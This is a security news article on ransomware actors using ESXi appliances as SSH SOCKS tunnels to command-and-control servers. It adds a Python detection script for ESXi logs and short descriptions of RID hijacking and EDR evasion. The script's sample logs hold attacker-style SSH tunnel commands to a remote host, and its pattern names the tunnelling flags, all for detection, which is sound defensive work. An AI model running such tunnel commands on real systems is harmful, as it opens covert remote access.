
Cybersecurity analysts have recently highlighted a concerning trend in ransomware attacks targeting ESXi systems. These attacks are not only compromising virtual infrastructure but also utilizing these systems as conduits for command-and-control (C2) traffic, effectively evading detection and establishing persistent access within corporate networks.

Ransomware exploitation of ESXi systems

According to a report from Sygnia researchers Zhongyuan Hau and Ren Jie Yow, threat actors are increasingly exploiting unmonitored ESXi appliances as a means to maintain access and facilitate lateral movement within networks. By employing “living-off-the-land” tactics, attackers utilize native tools like SSH to create SOCKS tunnels between their C2 servers and the compromised environments. This method allows them to blend malicious traffic with legitimate network activity, significantly reducing the likelihood of detection by existing security measures.

Compromise techniques

The report indicates that attackers typically gain access through compromised admin credentials or by exploiting known vulnerabilities in ESXi systems. Once inside, they establish a semi-persistent backdoor via SSH tunneling, taking advantage of the resilience of ESXi appliances, which are less likely to be shut down unexpectedly. This approach not only facilitates long-term persistence but also complicates incident response efforts due to the challenges associated with monitoring logs from these systems.

Recommendations for detection

To combat these sophisticated attacks, organizations are advised to closely monitor specific log files on their ESXi appliances:

  • /var/log/shell.log: Records shell activity.
  • /var/log/hostd.log: Contains logs from the host agent.
  • /var/log/auth.log: Tracks authentication events.
  • /var/log/vobd.log: Logs from the VMware observer daemon.

By configuring log forwarding and analyzing these logs, security teams can enhance their ability to detect unauthorized SSH tunneling activities.
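As an added example (not code from the article or from the Sygnia report), the following Python script shows the kind of check a SIEM rule or a quick triage script would run over forwarded ESXi logs: it flags ssh invocations in shell.log that carry a forwarding flag (-D SOCKS, -R reverse, -L local, -w tunnel device) and sshd logins in auth.log from outside a trusted admin range. The log lines, hosts and the trusted prefix are constructed to approximate the ESXi formats and are assumptions, not captured data.

```python
import os
import re
import shlex
from typing import Dict, List

# Constructed sample lines approximating ESXi /var/log/shell.log and
# /var/log/auth.log (not taken from a real host; addresses are documentation ranges).
SAMPLE_SHELL_LOG = """\
2024-05-02T09:14:03Z shell[2101054]: [root]: esxcli network ip interface list
2024-05-02T09:15:11Z shell[2101054]: [root]: ssh -f -N -D 1080 backup@203.0.113.9
2024-05-02T09:16:40Z shell[2101054]: [root]: ssh -N -R 2222:localhost:22 ops@203.0.113.9
2024-05-02T09:17:02Z shell[2101054]: [root]: ssh root@10.0.0.5 'hostname'
"""
SAMPLE_AUTH_LOG = """\
2024-05-02T02:03:44Z sshd[2100112]: Accepted keyboard-interactive/pam for root from 198.51.100.7 port 41622 ssh2
2024-05-02T09:10:01Z sshd[2100987]: Accepted publickey for root from 10.0.0.20 port 55110 ssh2
"""

SHELL_RE = re.compile(r"^(?P<ts>\S+)\s+shell\[\d+\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$")
# ".*?" tolerates the extra priority token (e.g. "In(38)") newer ESXi builds emit.
AUTH_RE = re.compile(r"^(?P<ts>\S+)\s+.*?sshd\[\d+\]:\s+Accepted\s+(?P<method>\S+)"
                     r"\s+for\s+(?P<user>\S+)\s+from\s+(?P<src>\S+)")
TUNNEL_FLAGS = set("DRLw")  # ssh options that create a forward/SOCKS/tun tunnel


def find_tunnel_commands(shell_log: str) -> List[Dict[str, str]]:
    """Return shell.log entries where ssh was started with a port-forwarding flag."""
    hits = []
    for line in shell_log.splitlines():
        m = SHELL_RE.match(line)
        if not m:
            continue
        cmd = m["cmd"]
        try:
            tokens = shlex.split(cmd)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            tokens = cmd.split()
        if not tokens or os.path.basename(tokens[0]) != "ssh":
            continue
        # Collect single-dash option letters, so "-fND" and "-D" are both seen.
        letters = {c for t in tokens[1:] if t.startswith("-") and not t.startswith("--") for c in t[1:]}
        tunnel = letters & TUNNEL_FLAGS
        if tunnel:
            hits.append({"ts": m["ts"], "user": m["user"], "flags": "".join(sorted(tunnel)), "cmd": cmd})
    return hits


def find_unexpected_logins(auth_log: str, trusted_prefixes=("10.0.0.",)) -> List[Dict[str, str]]:
    """Return accepted sshd logins whose source is outside the trusted admin prefixes (assumed)."""
    hits = []
    for line in auth_log.splitlines():
        m = AUTH_RE.match(line)
        if m and not m["src"].startswith(trusted_prefixes):
            hits.append({"ts": m["ts"], "user": m["user"], "method": m["method"], "src": m["src"]})
    return hits
```

Running the two functions over the samples flags the -D and -R sessions and the login from 198.51.100.7 while leaving the plain remote command and the in-range login alone; on a real deployment the same logic runs against the forwarded copies of these files rather than on the appliance itself.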

Related threats: RID Hijacking

In a parallel development, the North Korea-linked Andariel group has been employing a technique known as Relative Identifier (RID) hijacking. This method allows attackers to covertly escalate privileges by modifying the Windows Registry, enabling low-privileged accounts to gain administrative permissions during subsequent logins. Such tactics exploit the lack of scrutiny applied to standard accounts compared to administrator accounts, facilitating undetected malicious actions.

Advanced evasion techniques

Additionally, researchers have uncovered new methods for evading Endpoint Detection and Response (EDR) systems. By leveraging hardware breakpoints and native Windows functions like NtContinue, attackers can manipulate telemetry without triggering Event Tracing for Windows (ETW) logging. This capability allows them to execute stealthy operations while circumventing traditional security measures designed to flag suspicious activity.
